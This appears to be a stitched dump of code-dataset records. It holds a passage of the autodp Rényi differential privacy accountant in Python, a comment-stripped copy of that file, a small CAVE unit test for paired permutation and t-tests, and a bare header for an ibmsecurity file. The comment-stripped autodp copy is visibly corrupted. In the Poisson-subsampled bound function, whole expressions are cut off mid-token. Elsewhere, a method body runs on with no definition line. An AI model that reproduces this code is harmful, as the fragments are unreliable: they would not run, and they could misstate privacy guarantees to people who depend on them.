moment_bound = lambda j: np.minimum(j * np.log(np.exp(func(np.inf)) - 1) + np.minimum(cgf(j - 1), np.log(4)), np.log(2) + cgf(j - 1)) + j * np.log(prob) + utils.logcomb(mm, j) moments = [moment_bound(j) for j in range(2,mm+1,1)] return np.minimum(fastupperbound, utils.stable_logsumexp([0]+ moments)) else: # Compute the O(1) upper bound return fastupperbound def subsample_func(x): # This function returns the RDP at alpha = x # RDP with the linear interpolation upper bound of the CGF epsinf, tmp = subsample_epsdelta(func(np.inf),0,prob) if np.isinf(x): return epsinf if prob == 1.0: return func(x) if (x >= 1.0) and (x <= 2.0): return np.minimum(epsinf, subsample_func_int(2.0) / (2.0-1)) if np.equal(np.mod(x, 1), 0): return np.minimum(epsinf, subsample_func_int(x) / (x-1) ) xc = math.ceil(x) xf = math.floor(x) return np.minimum( epsinf, ((x-xf)*subsample_func_int(xc) + (1-(x-xf))*subsample_func_int(xf)) / (x-1) ) # book keeping self.idxhash[(func, prob)] = self.n # save the index self.n += 1 # increment the number of unique mechanisms self.coeffs.append(coeff) # Update the coefficient self.RDPs.append(subsample_func) # update the analytical functions # also update the integer results up to m_max. if (func,prob) in self.cache: results = self.cache[(func,prob)] else: results = np.zeros_like(self.RDPs_int, float) # m = np.max(self.lambs) mm = np.max(self.alphas) for alpha in range(2, mm+1): results[alpha-1] = subsample_func(alpha) results[0] = results[1] # Provide the trivial upper bound of RDP at alpha = 1 --- the KL privacy. 
self.cache[(func,prob)] = results # save in cache self.RDPs_int += results * coeff # update the pure DP eps, delta = subsample_epsdelta(func(np.inf), 0, prob) self.RDP_inf += eps * coeff # mm = np.max(self.alphas) # # jvec = np.arange(2, mm+1) # # logterm3plus = np.zeros_like(results) # for j in jvec: # logterm3plus[j-2] = (np.minimum(np.minimum(j * np.log(np.exp(func(np.inf)) - 1) # + np.minimum(np.log(4),cgf(j-1)), np.log(2) + cgf(j-1)), # np.log(4) + 0.5 * deltas[int(2 * np.floor(j / 2.0))-1] # + 0.5 * deltas[int(2 * np.ceil(j / 2.0))-1]) # + j * np.log(prob)) # # for alpha in range(2, mm+1): # if np.isinf(logterm3plus[alpha-1]): # results[alpha-1] = np.inf # else: # tmp = utils.stable_logsumexp(logterm3plus[0:alpha-1] + self.logBinomC[alpha, 2:(alpha+1)]) # results[alpha-1] = utils.stable_logsumexp_two(0, tmp) / (1.0*alpha-1) # # results[0] = results[1] # Provide the trivial upper bound of RDP at alpha = 1 --- the KL privacy. # # self.cache[(func,prob)] = results # save in cache # self.RDPs_int += results # # # For debugging: The following 'results1' should be the same as 'results' above. # # results1 = np.zeros_like(self.RDPs_int, float) # # for j in range(self.m): # # results1[j] = subsample_func(j+1) # # eps, delta = subsample_epsdelta(func(np.inf), 0, prob) # self.RDP_inf += eps def compose_poisson_subsampled_mechanisms(self, func, prob, coeff=1.0): # This function implements the lower bound for subsampled RDP. # It is also the exact formula of poission_subsampled RDP for many mechanisms including Gaussian mech. # # At the moment, we do not support mixing poisson subsampling and standard subsampling. # TODO: modify the caching identifies so that we can distinguish different types of subsampling # self.flag = False self.flag_subsample = True if (func, prob) in self.idxhash: idx = self.idxhash[(func, prob)] # TODO: this is really where it needs to be changed. 
# update the coefficients of each function self.coeffs[idx] += coeff # also update the integer CGFs self.RDPs_int += self.cache[(func, prob)] * coeff else: # compute an easy to compute upper bound of it. def cgf(x): return x * func(x+1) def subsample_func_int(x): # This function evaluates teh CGF at alpha = x, i.e., lamb = x- 1 if np.isinf(func(x)): return np.inf mm = int(x) # fastbound = fast_poission_subsampled_cgf_upperbound(func, mm, prob) k = self.alphas[-1] fastbound_k = fast_k_subsample_upperbound(func, mm, prob,k) if self.approx == True: return fastbound_k #fastbound = min(fastbound, fastbound_k) if x <= self.alphas[-1]: # compute the bound exactly. moments = [cgf(j-1) +j*np.log(prob) + (mm-j) * np.log(1-prob) + self.logBinomC[mm, j] for j in range(2,mm+1,1)] return utils.stable_logsumexp([(mm-1)*np.log(1-prob)+np.log(1+(mm-1)*prob)]+moments) elif mm <= self.m_lin_max: moments = [cgf(j-1) +j*np.log(prob) + (mm-j) * np.log(1-prob) + utils.logcomb(mm,j) for j in range(2,mm+1,1)] return utils.stable_logsumexp([(mm-1)*np.log(1-prob)+np.log(1+(mm-1)*prob)] + moments) else: return fastbound def subsample_func(x): # linear interpolation upper bound # This function implements the RDP at alpha = x if np.isinf(func(x)): return np.inf if prob == 1.0: return func(x) epsinf, tmp = subsample_epsdelta(func(np.inf),0,prob) if np.isinf(x): return epsinf if (x >= 1.0) and (x <= 2.0): return np.minimum(epsinf, subsample_func_int(2.0) / (2.0-1)) if np.equal(np.mod(x, 1), 0): return np.minimum(epsinf, subsample_func_int(x) / (x-1) ) xc = math.ceil(x) xf = math.floor(x) return np.minimum( epsinf, ((x-xf)*subsample_func_int(xc) + (1-(x-xf))*subsample_func_int(xf)) / (x-1) ) # book keeping self.idxhash[(func, prob)] = self.n # save the index self.n += 1 # increment the number of unique mechanisms self.coeffs.append(coeff) # Update the coefficient self.RDPs.append(subsample_func) # update the analytical functions # also update the integer results, with a vectorized computation. 
# TODO: pre-computing subsampled RDP for integers is error-prone (implement the same thing twice) # TODO: and its benefits are not clear. We should consider removing it and simply call the lambda function. # if (func,prob) in self.cache: results = self.cache[(func,prob)] else: results = np.zeros_like(self.RDPs_int, float) mm = np.max(self.alphas) # evaluate the RDP up to order mm jvec = np.arange(2, mm + 1) logterm3plus = np.zeros_like(results) # This saves everything from j=2 to j = m+1 for j in jvec: logterm3plus[j-2] = cgf(j-1) + j * np.log(prob) #- np.log(1-prob)) for alpha in range(2, mm+1): if np.isinf(logterm3plus[alpha-1]): results[alpha-1] = np.inf else: tmp = utils.stable_logsumexp(logterm3plus[0:alpha-1] + self.logBinomC[alpha , 2:(alpha + 1)] + (alpha+1-jvec[0:alpha-1])*np.log(1-prob)) results[alpha-1] = utils.stable_logsumexp_two((alpha-1)*np.log(1-prob) + np.log(1+(alpha-1)*prob), tmp) / (1.0*alpha-1) results[0] = results[1] # Provide the trivial upper bound of RDP at alpha = 1 --- the KL privacy. self.cache[(func,prob)] = results # save in cache self.RDPs_int += results * coeff # update the pure DP tracker eps, delta = subsample_epsdelta(func(np.inf), 0, prob) self.RDP_inf += eps * coeff def compose_poisson_subsampled_mechanisms1(self, func, prob, coeff=1.0): # This function implements the general amplification bounds for Poisson sampling. # No additional assumptions are needed. # At the moment, we do not support mixing poisson subsampling and standard subsampling. # self.flag = False self.flag_subsample = True if (func, prob) in self.idxhash: idx = self.idxhash[(func, prob)] # update the coefficients of each function self.coeffs[idx] += coeff # also update the integer CGFs self.RDPs_int += self.cache[(func, prob)] * coeff else: # compute an easy to compute upper bound of it. 
cgf = lambda x: x*func(x+1) def subsample_func_int(x): # This function evaluates the CGF at alpha = x, i.e., lamb = x- 1 if np.isinf(func(x)): return np.inf if prob == 1.0: return func(x) mm = int(x) fastbound = fast_poission_subsampled_cgf_upperbound(func, mm, prob) if x <= self.alphas[-1]: # compute the bound exactly. moments = [cgf(1) + 2*np.log(prob) + (mm-2) * np.log(1 - prob) + self.logBinomC[mm, 2]] moments = moments + [cgf(j-1+1) +j*np.log(prob) + (mm-j) * np.log(1 - prob) + self.logBinomC[mm, j] for j in range(3,mm+1,1)] return utils.stable_logsumexp([(mm-1)*np.log(1-prob)+np.log(1+(mm-1)*prob)]+moments) elif mm <= self.m_lin_max: moments = [cgf(1) + 2*np.log(prob) + (mm-2) * np.log(1 - prob) + utils.logcomb(mm, 2)] moments = moments + [cgf(j-1+1) +j*np.log(prob) + (mm-j) * np.log(1 - prob) + utils.logcomb(mm, j) for j in range(3,mm+1,1)] return utils.stable_logsumexp([(mm-1)*np.log(1-prob)+np.log(1+(mm-1)*prob)]+moments) else: return fastbound def subsample_func(x): # linear interpolation upper bound epsinf, tmp = subsample_epsdelta(func(np.inf),0,prob) if np.isinf(x): return epsinf if (x >= 1.0) and (x <= 2.0): return np.minimum(epsinf, subsample_func_int(2.0) / (2.0-1)) if np.equal(np.mod(x, 1), 0): return np.minimum(epsinf, subsample_func_int(x) / (x-1) ) xc = math.ceil(x) xf = math.floor(x) return np.minimum( epsinf, ((x-xf)*subsample_func_int(xc) + (1-(x-xf))*subsample_func_int(xf)) / (x-1) ) # book keeping self.idxhash[(func, prob)] = self.n # save the index self.n += 1 # increment the number of unique mechanisms self.coeffs.append(coeff) # Update the coefficient self.RDPs.append(subsample_func) # update the analytical functions # also update the integer results if (func,prob) in self.cache: results = self.cache[(func,prob)] else: results = np.zeros_like(self.RDPs_int, float) mm = np.max(self.alphas) # evaluate the RDP up to order mm for alpha in range(2, mm+1): results[alpha-1] = subsample_func_int(alpha) results[0] = results[1] # Provide the 
trivial upper bound of RDP at alpha = 1 --- the KL privacy. self.cache[(func,prob)] = results # save in cache self.RDPs_int += results * coeff # update the pure DP tracker eps, delta = subsample_epsdelta(func(np.inf), 0, prob) self.RDP_inf += eps * coeff # TODO: 1. Modularize the several Poission sampling versions. 2. Support both sampling schemes together.
44.658473
125
0.534312
import numpy as np from scipy.optimize import minimize_scalar import sys sys.path.append('..') import autodp from autodp import utils, rdp_bank from autodp.privacy_calibrator import subsample_epsdelta import scipy import math def general_upperbound(func, mm, prob): def cgf(x): return (x - 1) * func(x) if np.isinf(func(mm)): return np.inf if mm == 1 or mm == 0: return 0 cur_k = np.minimum(50, mm - 1) log_term_1 = mm * np.log(1 - prob) log_term_2 = np.log(3) - func(mm) + mm * utils.stable_logsumexp_two(np.log(1 - prob), np.log(prob) + func(mm)) neg_term_3 = [np.log(scipy.special.comb(mm,l)) + np.log(3) + (mm - l) * np.log(1 - prob) + l * np.log(prob) + utils.stable_log_diff_exp((l - 1) * func(mm), cgf(l))[1] for l in range(3, cur_k + 1)] neg_term_4 = np.log(mm*(mm - 1)/2) + 2 * np.log(prob) + (mm - 2) * np.log( 1 - prob) + utils.stable_log_diff_exp(np.log(3) + func(mm), func(2))[1] neg_term_5 = np.log(2) + np.log(prob) + np.log(mm) + (mm - 1) * np.log(1 - prob) neg_term_6 = mm * np.log(1 - prob) + np.log(3) - func(mm) pos_term = utils.stable_logsumexp([log_term_1, log_term_2]) neg_term_3.append(neg_term_4) neg_term_3.append(neg_term_5) neg_term_3.append(neg_term_6) neg_term = utils.stable_logsumexp(neg_term_3) bound = utils.stable_log_diff_exp(pos_term, neg_term)[1] return bound def fast_subsampled_cgf_upperbound(func, mm, prob, deltas_local): return np.inf if np.isinf(func(mm)): return np.inf if mm == 1: return 0 secondterm = np.minimum(np.minimum((2) * np.log(np.exp(func(np.inf)) - 1) + np.minimum(func(2), np.log(4)), np.log(2) + func(2)), np.log(4) + 0.5 * deltas_local[int(2 * np.floor(2 / 2.0)) - 1] + 0.5 * deltas_local[int(2 * np.ceil(2 / 2.0)) - 1] ) + 2 * np.log(prob) + np.log(mm) + np.log(mm - 1) - np.log(2) if mm == 2: return utils.stable_logsumexp([0, secondterm]) logratio1 = np.log(prob) + np.log(mm) + func(mm) logratio2 = logratio1 + np.log(np.exp(func(np.inf)) - 1) logratio = np.minimum(logratio1, logratio2) if logratio1 > logratio2: coeff = 1 else: 
coeff = 2 if mm == 3: return utils.stable_logsumexp([0, secondterm, np.log(coeff) + 3 * logratio]) if logratio < 0: geometric_series_bound = np.log(coeff) + 3 * logratio - np.log(1 - np.exp(logratio)) \ + np.log(1 - np.exp((mm - 2) * logratio)) elif logratio > 0: geometric_series_bound = np.log(coeff) + 3 * logratio + (mm-2) * logratio - np.log(np.exp(logratio) - 1) else: geometric_series_bound = np.log(coeff) + np.log(mm - 2) logh1 = np.log(prob) + func(mm - 1) logh2 = logh1 + np.log(np.exp(func(np.inf)) - 1) binomial_series_bound1 = np.log(2) + mm * utils.stable_logsumexp_two(0, logh1) binomial_series_bound2 = mm * utils.stable_logsumexp_two(0, logh2) tmpsign, binomial_series_bound1 \ = utils.stable_sum_signed(True, binomial_series_bound1, False, np.log(2) + utils.stable_logsumexp([0, logh1 + np.log(mm), 2 * logh1 + np.log(mm) + np.log(mm - 1) - np.log(2)])) tmpsign, binomial_series_bound2 \ = utils.stable_sum_signed(True, binomial_series_bound2, False, utils.stable_logsumexp([0, logh2 + np.log(mm), 2 * logh2 + np.log(mm) + np.log(mm - 1) - np.log(2)])) remainder = np.min([geometric_series_bound, binomial_series_bound1, binomial_series_bound2]) return utils.stable_logsumexp([0, secondterm, remainder]) def fast_poission_subsampled_cgf_upperbound(func, mm, prob): if np.isinf(func(mm)): return np.inf if mm == 1: return 0 .log(1-prob), np.log(prob) + func(mm)) mexp([mm * np.log(1-prob), (mm-1) * np.log(1-prob) + np.log(mm) + np.log(prob), (mm-2)*np.log(1-prob) + 2 * np.log(prob) + np.log(mm) + np.log(mm-1) + func(2), np.log(mm) + np.log(mm-1) + np.log(mm-2) - np.log(3*2) + 3 * np.log(prob) + (mm-3)*np.log(1-prob) + 2 * func(mm) + (mm-3) * utils.stable_logsumexp_two(0, np.log(prob) - np.log(1-prob) + func(mm))]) else: bound2 = bound1 return np.minimum(bound1,bound2) def fast_k_subsample_upperbound(func, mm, prob, k): def cgf(x): return (x - 1) * func(x) if np.isinf(func(mm)): return np.inf if mm == 1: return 0 cur_k = np.minimum(k, mm - 1) if (2 * cur_k) >= mm: 
exact_term_1 = (mm - 1) * np.log(1 - prob) + np.log(mm * prob - prob + 1) exact_term_2 = [np.log(scipy.special.comb(mm,l)) + (mm - l) * np.log(1 - prob) + l * np.log(prob) + cgf(l) for l in range(2, mm + 1)] exact_term_2.append(exact_term_1) bound = utils.stable_logsumexp(exact_term_2) return bound s, mag1 = utils.stable_log_diff_exp(0, -func(mm - cur_k)) new_log_term_1 = np.log(1 - prob) * mm + mag1 new_log_term_2 = -func(mm - cur_k) + mm * utils.stable_logsumexp_two(np.log(1 - prob), np.log(prob) + func(mm - cur_k)) new_log_term_3 = [np.log(scipy.special.comb(mm,l)) + (mm - l) * np.log(1 - prob) + l * np.log(prob) + utils.stable_log_diff_exp((l - 1) * func(mm - cur_k), cgf(l))[1] for l in range(2, cur_k + 1)] if len(new_log_term_3) > 0: new_log_term_3 = utils.stable_logsumexp(new_log_term_3) else: return utils.stable_logsumexp_two(new_log_term_1, new_log_term_2) new_log_term_4 = [np.log(scipy.special.comb(mm,mm-l)) + (mm - l) * np.log(1 - prob) + l * np.log(prob) + utils.stable_log_diff_exp(cgf(l), (l - 1) * func(mm - cur_k))[1] for l in range(mm - cur_k + 1, mm + 1)] new_log_term_4.append(new_log_term_1) new_log_term_4.append(new_log_term_2) new_log_term_4 = utils.stable_logsumexp(new_log_term_4) s, new_log_term_5 = utils.stable_log_diff_exp(new_log_term_4, new_log_term_3) new_bound = new_log_term_5 return new_bound class anaRDPacct: def __init__(self, m=100, tol=0.1, m_max=500, m_lin_max=10000, approx = False, verbose=False): self.m = m self.m_max = m_max self.m_lin_max = m_lin_max self.verbose = verbose self.approx = approx self.lambs = np.linspace(1, self.m, self.m).astype(int) self.alphas = np.linspace(1, self.m, self.m).astype(int) self.RDPs_int = np.zeros_like(self.alphas, float) self.n=0 self.RDPs = [] self.coeffs = [] self.RDP_inf = .0 self.logBinomC = utils.get_binom_coeffs(self.m + 1) self.idxhash = {} self.cache = {} self.deltas_cache = {} self.evalRDP = lambda x: 0 self.flag = True self.flag_subsample = False self.tol = tol def 
build_zeroth_oracle(self): self.evalRDP = lambda x: sum([c * item(x) for (c, item) in zip(self.coeffs, self.RDPs)]) def plot_rdp(self): if not self.flag: self.build_zeroth_oracle() self.flag = True import matplotlib.pyplot as plt plt.figure(num=None, figsize=(12, 8), dpi=80, facecolor='w', edgecolor='k') x = range(0,self.m,1) y = [self.evalRDP(item) for item in x] plt.loglog(x, y) plt.show() def plot_cgf_int(self): import matplotlib.pyplot as plt plt.figure(num=None, figsize=(12, 8), dpi=80, facecolor='w', edgecolor='k') plt.plot(self.alphas, self.RDPs_int) plt.xlabel(r'$\lambda$') plt.ylabel('CGF') plt.show() def plot_rdp_int(self): import matplotlib.pyplot as plt plt.figure(num=None, figsize=(12, 8), dpi=80, facecolor='w', edgecolor='k') plt.loglog(self.alphas, self.RDPs_int) if not self.flag: self.build_zeroth_oracle() self.flag = True x = range(1,self.m_lin_max,1) y = [self.evalRDP(item) for item in x] plt.loglog(x, y) plt.xlabel(r'$\alpha$') plt.ylabel(r'RDP $\epsilon$') plt.show() def get_rdp(self,alphas): if not self.flag: self.build_zeroth_oracle() self.flag = True alphas = np.array(alphas) assert(np.all(alphas >= 1)) rdp_list = [] for alpha in alphas: rdp_list.append(self.evalRDP(alpha)) return np.array(rdp_list) def get_eps(self, delta): if not self.flag: self.build_zeroth_oracle() self.flag = True if delta<0 or delta > 1: print("Error! 
delta is a probability and must be between 0 and 1") if delta == 0: return self.RDP_inf else: def fun(x): if x <= 1: return np.inf else: return np.log(1 / delta)/(x-1) + self.evalRDP(x) def fun_int(i): # the input is RDP's \alpha in integer if i <= 1 | i >= len(self.RDPs_int): return np.inf else: return np.log(1 / delta) / (i-1) + self.RDPs_int[i - 1] while (self.m<self.m_max) and (not np.isposinf(fun(self.m))) and (fun_int(self.m-1)-fun_int(self.m-2) < 0): if self.flag_subsample: self.logBinomC = utils.get_binom_coeffs(self.m*2+1) for key, val in self.deltas_cache.items(): if type(key) is tuple: func_tmp = key[0] else: func_tmp = key cgf = lambda x: x*func_tmp(x+1) deltas,signs_deltas = utils.get_forward_diffs(cgf,self.m*2) self.deltas_cache[key] = [deltas, signs_deltas] new_alphas = range(self.m + 1, self.m * 2 + 1, 1) self.alphas = np.concatenate((self.alphas, np.array(new_alphas))) self.m = self.m * 2 mm = np.max(self.alphas) rdp_int_new = np.zeros_like(self.alphas, float) for key,val in self.cache.items(): idx = self.idxhash[key] rdp = self.RDPs[idx] newarray = np.zeros_like(self.alphas, float) for j in range(2,mm+1,1): newarray[j-1] = rdp(1.0*j) newarray[0]=newarray[1] coeff = self.coeffs[idx] rdp_int_new += newarray * coeff self.cache[key] = newarray self.RDPs_int = rdp_int_new bestint = np.argmin(np.log(1 / delta)/(self.alphas[1:]-1) + self.RDPs_int[1:]) + 1 if bestint == self.m-1: if self.verbose: print('Warning: Reach quadratic upper bound: m_max.') cur = fun(bestint) while (not np.isposinf(cur)) and fun(bestint-1)-fun(bestint-2) < -1e-8: bestint = bestint*2 cur = fun(bestint) if bestint > self.m_lin_max and self.approx ==True: print('Warning: Reach linear upper bound: m_lin_max.') return cur results = minimize_scalar(fun, method='Bounded', bounds=[self.m-1, bestint + 2], options={'disp': False}) if results.success: return results.fun else: return None if bestint == 0: if self.verbose: print('Warning: Smallest alpha = 1.') bestalpha = self.alphas[bestint] 
results = minimize_scalar(fun, method='Bounded',bounds=[bestalpha-1, bestalpha+1], options={'disp':False}) if results.success: return results.fun else: return -1 def compose_mechanism(self, func, coeff=1.0): self.flag = False if func in self.idxhash: self.coeffs[self.idxhash[func]] += coeff self.RDPs_int += self.cache[func] * coeff else: self.idxhash[func] = self.n self.n += 1 self.coeffs.append(coeff) self.RDPs.append(func) if func in self.cache: tmp = self.cache[func] else: tmp = np.zeros_like(self.RDPs_int, float) for i in range(self.m): tmp[i] = func(i+1) self.cache[func] = tmp self.RDPs_int += tmp * coeff self.RDP_inf += func(np.inf) * coeff def compose_subsampled_mechanism(self, func, prob, coeff=1.0): self.flag = False self.flag_subsample = True if (func, prob) in self.idxhash: idx = self.idxhash[(func, prob)] self.coeffs[idx] += coeff self.RDPs_int += self.cache[(func, prob)] * coeff else: def cgf(x): return x * func(x+1) deltas, signs_deltas = utils.get_forward_diffs(cgf,self.m) self.deltas_cache[(func,prob)] = [deltas,signs_deltas] def subsample_func_int(x): deltas_local, signs_deltas_local = self.deltas_cache[(func,prob)] if np.isinf(func(x)): return np.inf mm = int(x) fastupperbound = fast_subsampled_cgf_upperbound(func, mm, prob, deltas_local) fastupperbound2 = general_upperbound(func, mm, prob) if self.approx ==True: if fastupperbound2 <0: print('general rdp is negative',x) return fastupperbound2 if mm <= self.alphas[-1]: moments = [ np.minimum(np.minimum((j)*np.log(np.exp(func(np.inf))-1) + np.minimum(cgf(j-1),np.log(4)), np.log(2) + cgf(j-1)), np.log(4) + 0.5*deltas_local[int(2*np.floor(j/2.0))-1] + 0.5*deltas_local[int(2*np.ceil(j/2.0))-1]) + j*np.log(prob) +self.logBinomC[int(mm), j] for j in range(2,int(mm+1),1)] return np.minimum(fastupperbound, utils.stable_logsumexp([0]+moments)) elif mm <= self.m_lin_max: moment_bound = lambda j: np.minimum(j * np.log(np.exp(func(np.inf)) - 1) + np.minimum(cgf(j - 1), np.log(4)), np.log(2) + cgf(j - 1)) + j * 
np.log(prob) + utils.logcomb(mm, j) moments = [moment_bound(j) for j in range(2,mm+1,1)] return np.minimum(fastupperbound, utils.stable_logsumexp([0]+ moments)) else: return fastupperbound def subsample_func(x): epsinf, tmp = subsample_epsdelta(func(np.inf),0,prob) if np.isinf(x): return epsinf if prob == 1.0: return func(x) if (x >= 1.0) and (x <= 2.0): return np.minimum(epsinf, subsample_func_int(2.0) / (2.0-1)) if np.equal(np.mod(x, 1), 0): return np.minimum(epsinf, subsample_func_int(x) / (x-1) ) xc = math.ceil(x) xf = math.floor(x) return np.minimum( epsinf, ((x-xf)*subsample_func_int(xc) + (1-(x-xf))*subsample_func_int(xf)) / (x-1) ) self.idxhash[(func, prob)] = self.n self.n += 1 self.coeffs.append(coeff) self.RDPs.append(subsample_func) if (func,prob) in self.cache: results = self.cache[(func,prob)] else: results = np.zeros_like(self.RDPs_int, float) mm = np.max(self.alphas) for alpha in range(2, mm+1): results[alpha-1] = subsample_func(alpha) results[0] = results[1] self.cache[(func,prob)] = results self.RDPs_int += results * coeff eps, delta = subsample_epsdelta(func(np.inf), 0, prob) self.RDP_inf += eps * coeff self.flag = False self.flag_subsample = True if (func, prob) in self.idxhash: idx = self.idxhash[(func, prob)] self.coeffs[idx] += coeff self.RDPs_int += self.cache[(func, prob)] * coeff else: def cgf(x): return x * func(x+1) def subsample_func_int(x): if np.isinf(func(x)): return np.inf mm = int(x) fastbound = fast_poission_subsampled_cgf_upperbound(func, mm, prob) k = self.alphas[-1] fastbound_k = fast_k_subsample_upperbound(func, mm, prob,k) if self.approx == True: return fastbound_k if x <= self.alphas[-1]: moments = [cgf(j-1) +j*np.log(prob) + (mm-j) * np.log(1-prob) + self.logBinomC[mm, j] for j in range(2,mm+1,1)] return utils.stable_logsumexp([(mm-1)*np.log(1-prob)+np.log(1+(mm-1)*prob)]+moments) elif mm <= self.m_lin_max: moments = [cgf(j-1) +j*np.log(prob) + (mm-j) * np.log(1-prob) + utils.logcomb(mm,j) for j in range(2,mm+1,1)] return 
utils.stable_logsumexp([(mm-1)*np.log(1-prob)+np.log(1+(mm-1)*prob)] + moments) else: return fastbound def subsample_func(x): if np.isinf(func(x)): return np.inf if prob == 1.0: return func(x) epsinf, tmp = subsample_epsdelta(func(np.inf),0,prob) if np.isinf(x): return epsinf if (x >= 1.0) and (x <= 2.0): return np.minimum(epsinf, subsample_func_int(2.0) / (2.0-1)) if np.equal(np.mod(x, 1), 0): return np.minimum(epsinf, subsample_func_int(x) / (x-1) ) xc = math.ceil(x) xf = math.floor(x) return np.minimum( epsinf, ((x-xf)*subsample_func_int(xc) + (1-(x-xf))*subsample_func_int(xf)) / (x-1) ) self.idxhash[(func, prob)] = self.n self.n += 1 self.coeffs.append(coeff) self.RDPs.append(subsample_func) if (func,prob) in self.cache: results = self.cache[(func,prob)] else: results = np.zeros_like(self.RDPs_int, float) mm = np.max(self.alphas) jvec = np.arange(2, mm + 1) logterm3plus = np.zeros_like(results) for j in jvec: logterm3plus[j-2] = cgf(j-1) + j * np.log(prob) for alpha in range(2, mm+1): if np.isinf(logterm3plus[alpha-1]): results[alpha-1] = np.inf else: tmp = utils.stable_logsumexp(logterm3plus[0:alpha-1] + self.logBinomC[alpha , 2:(alpha + 1)] + (alpha+1-jvec[0:alpha-1])*np.log(1-prob)) results[alpha-1] = utils.stable_logsumexp_two((alpha-1)*np.log(1-prob) + np.log(1+(alpha-1)*prob), tmp) / (1.0*alpha-1) results[0] = results[1] self.cache[(func,prob)] = results self.RDPs_int += results * coeff eps, delta = subsample_epsdelta(func(np.inf), 0, prob) self.RDP_inf += eps * coeff def compose_poisson_subsampled_mechanisms1(self, func, prob, coeff=1.0): self.flag = False self.flag_subsample = True if (func, prob) in self.idxhash: idx = self.idxhash[(func, prob)] self.coeffs[idx] += coeff self.RDPs_int += self.cache[(func, prob)] * coeff else: cgf = lambda x: x*func(x+1) def subsample_func_int(x): if np.isinf(func(x)): return np.inf if prob == 1.0: return func(x) mm = int(x) fastbound = fast_poission_subsampled_cgf_upperbound(func, mm, prob) if x <= self.alphas[-1]: 
moments = [cgf(1) + 2*np.log(prob) + (mm-2) * np.log(1 - prob) + self.logBinomC[mm, 2]] moments = moments + [cgf(j-1+1) +j*np.log(prob) + (mm-j) * np.log(1 - prob) + self.logBinomC[mm, j] for j in range(3,mm+1,1)] return utils.stable_logsumexp([(mm-1)*np.log(1-prob)+np.log(1+(mm-1)*prob)]+moments) elif mm <= self.m_lin_max: moments = [cgf(1) + 2*np.log(prob) + (mm-2) * np.log(1 - prob) + utils.logcomb(mm, 2)] moments = moments + [cgf(j-1+1) +j*np.log(prob) + (mm-j) * np.log(1 - prob) + utils.logcomb(mm, j) for j in range(3,mm+1,1)] return utils.stable_logsumexp([(mm-1)*np.log(1-prob)+np.log(1+(mm-1)*prob)]+moments) else: return fastbound def subsample_func(x): epsinf, tmp = subsample_epsdelta(func(np.inf),0,prob) if np.isinf(x): return epsinf if (x >= 1.0) and (x <= 2.0): return np.minimum(epsinf, subsample_func_int(2.0) / (2.0-1)) if np.equal(np.mod(x, 1), 0): return np.minimum(epsinf, subsample_func_int(x) / (x-1) ) xc = math.ceil(x) xf = math.floor(x) return np.minimum( epsinf, ((x-xf)*subsample_func_int(xc) + (1-(x-xf))*subsample_func_int(xf)) / (x-1) ) self.idxhash[(func, prob)] = self.n self.n += 1 self.coeffs.append(coeff) self.RDPs.append(subsample_func) if (func,prob) in self.cache: results = self.cache[(func,prob)] else: results = np.zeros_like(self.RDPs_int, float) mm = np.max(self.alphas) for alpha in range(2, mm+1): results[alpha-1] = subsample_func_int(alpha) results[0] = results[1] self.cache[(func,prob)] = results self.RDPs_int += results * coeff eps, delta = subsample_epsdelta(func(np.inf), 0, prob) self.RDP_inf += eps * coeff
true
true
f705c04fa8bb30cc2be892362cc4af89d3328301
1,297
py
Python
test/test_utils/test_statistical_tests.py
deslay1/CAVE
e4b9abc3812034f49dddd27ffc17dbab39782a1c
[ "BSD-3-Clause" ]
45
2018-01-11T11:26:11.000Z
2021-06-22T06:14:39.000Z
test/test_utils/test_statistical_tests.py
deslay1/CAVE
e4b9abc3812034f49dddd27ffc17dbab39782a1c
[ "BSD-3-Clause" ]
150
2017-12-20T16:14:45.000Z
2021-09-28T11:26:33.000Z
test/test_utils/test_statistical_tests.py
automl/SpySMAC
afcbecd0b9cb97276625c16a89cb6df141e6f6f2
[ "BSD-3-Clause" ]
17
2018-03-17T04:46:09.000Z
2021-02-18T18:31:38.000Z
import logging import unittest import numpy as np from cave.utils.statistical_tests import paired_permutation, paired_t_student class TestStatisticalTests(unittest.TestCase): def setUp(self): self.logger = logging.getLogger("TestStatisticalTests") def test_paired_permutation(self): """ Testing paired permutation test. """ rng = np.random.RandomState(42) a, b = rng.normal(loc=0, size=100), rng.normal(loc=0, size=100) result = paired_permutation(a, a, rng, 100, self.logger) self.assertGreater(result, 0.9999) result = paired_permutation(a, b, rng, 100, self.logger) self.assertGreater(result, 0.3) a, b = rng.normal(loc=-1, size=100), rng.normal(loc=1, size=100) result = paired_permutation(a, b, rng, 1000, self.logger) self.assertLess(result, 0.001) def test_t_student(self): """ Testing paired t-test. """ rng = np.random.RandomState(42) a, b = rng.normal(loc=0, size=100), rng.normal(loc=0, size=100) result = paired_t_student(a, b, self.logger) self.assertGreater(result, 0.3) a, b = rng.normal(loc=-1, size=100), rng.normal(loc=1, size=100) result = paired_t_student(a, b, self.logger) self.assertLess(result, 0.001)
37.057143
77
0.651503
import logging import unittest import numpy as np from cave.utils.statistical_tests import paired_permutation, paired_t_student class TestStatisticalTests(unittest.TestCase): def setUp(self): self.logger = logging.getLogger("TestStatisticalTests") def test_paired_permutation(self): rng = np.random.RandomState(42) a, b = rng.normal(loc=0, size=100), rng.normal(loc=0, size=100) result = paired_permutation(a, a, rng, 100, self.logger) self.assertGreater(result, 0.9999) result = paired_permutation(a, b, rng, 100, self.logger) self.assertGreater(result, 0.3) a, b = rng.normal(loc=-1, size=100), rng.normal(loc=1, size=100) result = paired_permutation(a, b, rng, 1000, self.logger) self.assertLess(result, 0.001) def test_t_student(self): rng = np.random.RandomState(42) a, b = rng.normal(loc=0, size=100), rng.normal(loc=0, size=100) result = paired_t_student(a, b, self.logger) self.assertGreater(result, 0.3) a, b = rng.normal(loc=-1, size=100), rng.normal(loc=1, size=100) result = paired_t_student(a, b, self.logger) self.assertLess(result, 0.001)
true
true
f705c09c479088d7f96725e5df722801a0715965
5,653
py
Python
ibmsecurity/isam/base/network/felb/services/servers.py
ibm-enio/ibmsecurity
81f989678642c3b6a49b2a3fbb5d9ca98804ef17
[ "Apache-2.0" ]
2
2019-12-05T13:51:10.000Z
2019-12-20T08:02:35.000Z
ibmsecurity/isam/base/network/felb/services/servers.py
ibm-enio/ibmsecurity
81f989678642c3b6a49b2a3fbb5d9ca98804ef17
[ "Apache-2.0" ]
null
null
null
ibmsecurity/isam/base/network/felb/services/servers.py
ibm-enio/ibmsecurity
81f989678642c3b6a49b2a3fbb5d9ca98804ef17
[ "Apache-2.0" ]
1
